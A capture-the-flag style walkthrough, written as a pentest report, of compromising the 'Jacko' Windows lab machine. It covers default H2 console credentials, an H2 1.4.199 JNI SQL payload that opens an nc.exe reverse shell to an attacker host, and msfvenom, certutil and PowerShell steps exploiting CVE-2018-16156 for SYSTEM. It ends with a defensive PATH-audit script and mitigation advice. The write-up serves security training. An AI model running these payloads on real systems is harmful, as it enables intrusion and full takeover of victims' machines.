PG Practice - Jacko Walkthrough
![PG Practice - Jacko Walkthrough](https://alexsecurity.rocks/posts/pgpractice-jacko/offensive_security-logo-black.jpg)
Introduction
This report provides a comprehensive analysis of a penetration test performed on ‘Jacko,’ a designated Windows machine classified as intermediate difficulty from Offensive Security’s PG Practice Labs. The objective of this test was to identify and exploit vulnerabilities within Jacko, with a focus on understanding the security posture of the system and recommending measures for mitigation and improvement. The scope of this test encompassed various stages of penetration testing, including information gathering, vulnerability assessment, exploitation, and post-exploitation analysis.
The key phases in the methodology included: Information Gathering, which involved acquiring initial information about the target; Service Enumeration, focused on identifying open ports and active services; Vulnerability Identification, aimed at discovering potential vulnerabilities; Initial Access, entailing the exploitation of identified vulnerabilities to gain entry into the system; Post-Compromise Enumeration, which involved acquiring more detailed information after gaining access; and finally, Privilege Escalation, aimed at raising access rights to gain further control.
Reconnaissance
The penetration test commenced with an nmap scan, revealing several open ports. Notably, ports 80 and 8082 were identified as significant: port 80 was hosting a Microsoft IIS server, and port 8082 was serving an H2 Database Engine.
```
nmap -sCV -p- -T4 -v 192.168.155.66 -oA jacko

Nmap scan report for 192.168.155.66
Host is up (0.057s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: H2 Database Engine (redirect)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
|_http-title: H2 Console
| http-methods:
|_  Supported Methods: GET POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2023-12-05T00:30:20
|_  start_date: N/A
|_clock-skew: -1s
```
Port 80
During the assessment, the H2 Database Engine interface was accessed via port 80. Although the version of the engine was not immediately discernible, the Quickstart guide revealed a web console on port 8082. Notably, default administrative credentials were found exposed on the Quickstart page, presenting a potential pathway for initial access.
Initial Access
Access to the H2 database web console on port 8082 was achieved using the default credentials. Subsequent investigation revealed that the H2 database was running version 1.4.199. This particular version is known to be vulnerable to a JNI code execution exploit. The vulnerability and its exploitation were detailed by Markus Wulftange and have been documented in a comprehensive blog post.
The critical aspect of this vulnerability lies in its ability to permit the execution of arbitrary Java code on the server, bypassing the need for a Java Compiler. This is achieved by leveraging the Java Native Interface (JNI), which allows for a Java class to be directly loaded into memory. Consequently, this exploit circumvents the typical requirement of having a Java Compiler present on the machine running the H2 database, thus posing a critical security risk.
Exploitation
In the initial phase of exploitation, the local environment had to be prepared to receive the reverse shell. Impacket’s smbserver.py script was used to set up an SMB server that would host the Netcat executable (nc.exe); the exploit running on the target would then call this executable from the share.

```
impacket-smbserver -smb2support tmp /home/kali/pg/jacko
```
Simultaneously, a Netcat listener was established to capture the reverse connection:
```
nc -nvlp 8082
```
With the environment appropriately configured, the next step involved executing the SQL statements.
```sql
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.45.154/share/nc.exe -e cmd.exe 192.168.45.154 8082").getInputStream()).useDelimiter("\Z").next()');
```
The "Evaluate script" statement used the Windows command line to execute nc.exe from the SMB share set up earlier, thereby creating a reverse shell to the listener.
When the target system executed these SQL commands, the nc.exe on the target initiated a connection back to the listener on port 8082. This action resulted in the reception of the shell on the attacking machine, effectively granting access to the target system.
Privilege Escalation
Upon establishing a foothold within the target system, the next objective was to escalate privileges to gain more comprehensive control over the system. Enumeration efforts led to the discovery of a directory named PAPERSTREAM IP within Program Files (x86). Further investigation of this directory revealed a potential vulnerability associated with the PaperStream IP (TWAIN) software.
Identifying the Vulnerability
The specific vulnerability was linked to CVE-2018-16156, a security flaw in PaperStream IP (TWAIN) 1.42.0.5685 (Service Update 7). This vulnerability revolves around the FJTWSVIC service, which runs with SYSTEM privileges and processes unauthenticated messages over the FjtwMkic_Fjicube_32 named pipe. A critical function within this service attempts to load the UninOldIS.dll library dynamically and executes its ChangeUninstallString function. Importantly, the default installation does not include this library, meaning that if a DLL with that name is placed in a PATH directory, it could be executed with SYSTEM privileges.
Addressing Environment Variable Issues
During the assessment, difficulties were encountered executing basic system commands like whoami due to a misconfigured PATH environment variable on the target machine. The PATH variable is essential as it directs the operating system to executable files. If key system directories are missing from PATH, common commands and executables become inaccessible.
To address this, the PATH variable was reset using the following command:
```
set PATH=%SystemRoot%\system32;%SystemRoot%;
```
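A small PATH audit, added here as example code (not part of the original walkthrough), that checks a Windows PATH value for the two system directories restored above and lists entries outside the administrator-only roots for an ACL review; the environment mapping and the sample PATH values are constructed.

```python
import re
import ntpath  # Windows path semantics, so the audit runs offline on any OS

# Directories every Windows PATH needs so that built-in tools such as whoami.exe resolve
# (the two entries the walkthrough restores with `set PATH=...`).
REQUIRED_DIRS = (r"%SystemRoot%\system32", r"%SystemRoot%")

# Roots that are normally writable only by administrators. Any PATH entry outside them
# deserves an ACL review, because a DLL planted in a PATH directory can be picked up by
# a SYSTEM service that loads a library by bare name, as described for FJTWSVIC above.
TRUSTED_PREFIXES = (r"%SystemRoot%", r"%ProgramFiles%", r"%ProgramFiles(x86)%")

# Constructed environment for an offline run; on a real host use os.environ instead.
SAMPLE_ENV = {
    "SystemRoot": r"C:\Windows",
    "ProgramFiles": r"C:\Program Files",
    "ProgramFiles(x86)": r"C:\Program Files (x86)",
}


def expand(entry, env):
    """Expand %VAR% references the way cmd.exe does (variable names are case-insensitive)."""
    lookup = {k.lower(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: lookup.get(m.group(1).lower(), m.group(0)), entry)


def normalize(entry, env):
    """Expand, then normalise separators, case and trailing backslashes for comparison."""
    return ntpath.normcase(ntpath.normpath(expand(entry, env)))


def audit_path(path_value, env=SAMPLE_ENV):
    """Report required system dirs missing from PATH and entries outside trusted roots."""
    entries = [e for e in path_value.split(";") if e.strip()]  # drop empty elements
    present = {normalize(e, env) for e in entries}
    missing = [d for d in REQUIRED_DIRS if normalize(d, env) not in present]
    trusted = [normalize(p, env) for p in TRUSTED_PREFIXES]
    review = [
        e for e in entries
        if not any(normalize(e, env) == t or normalize(e, env).startswith(t + "\\")
                   for t in trusted)
    ]
    return {"missing": missing, "review": review}
```

On a live host, pass `os.environ["PATH"]` and a real environment mapping; each entry in `review` should then be checked with icacls for write access by non-administrators.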
Crafting and Deploying the Exploit
During the assessment, an existing public exploit, Exploit-DB ID 49382, was identified. To make use of it, a custom DLL payload was first generated with msfvenom.
```
msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.154 LPORT=8082
```
Preparing for Payload Deployment
It was verified that the user (jacko\tony) had write permissions to the desktop directory, an important factor for placing the payload.
```
C:\Windows\System32\icacls.exe C:\users\tony\Desktop\
```
With this confirmation, it was necessary to modify the exploit to point to the payload generated by msfvenom.
Setting Up for the Exploit Execution
In order to execute the exploit, a Python HTTP server was started on the attacker machine. This server hosted both the exploit and the payload.
```
python3 -m http.server 80
```
Subsequently, certutil was used to download the exploit script and the payload onto the target machine.
```
certutil -urlcache -split -f http://192.168.45.154/49382.ps1
certutil -urlcache -split -f http://192.168.45.154/UninOldIS.dll
```
Gaining SYSTEM Privileges
Finally, a Netcat listener was set up on port 8082 to capture the reverse connection initiated by the exploit.
```
nc -nvlp 8082
```
Running the exploit:
```
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\49382.ps1
```
Recommendations
Jacko H2 Database Vulnerability
Change Default Credentials: It was observed that the H2 Database could be accessed using default credentials. It is strongly recommended to change these credentials to robust, unique passwords. A strong password should ideally be at least 16 characters long, comprising a mix of alphanumeric and special characters.
Enable Multi-Factor Authentication (MFA): If feasible, implement multi-factor authentication. MFA adds an additional layer of security, making unauthorized access significantly more challenging.
Restrict Access: Limit access to the H2 Database engine strictly to personnel who require it for their work. Implementing access controls will reduce the risk of unauthorized access and potential internal misuse.
PaperStream IP
Review and Enhance Patch Management Policies: It is crucial to establish a robust patch management process not only for PaperStream but for all software used within the environment. This process should ensure that all software, including PaperStream, is regularly updated to the latest versions. Timely application of patches is key in protecting against known vulnerabilities. Regular reviews of these policies will help maintain an effective defense against emerging threats.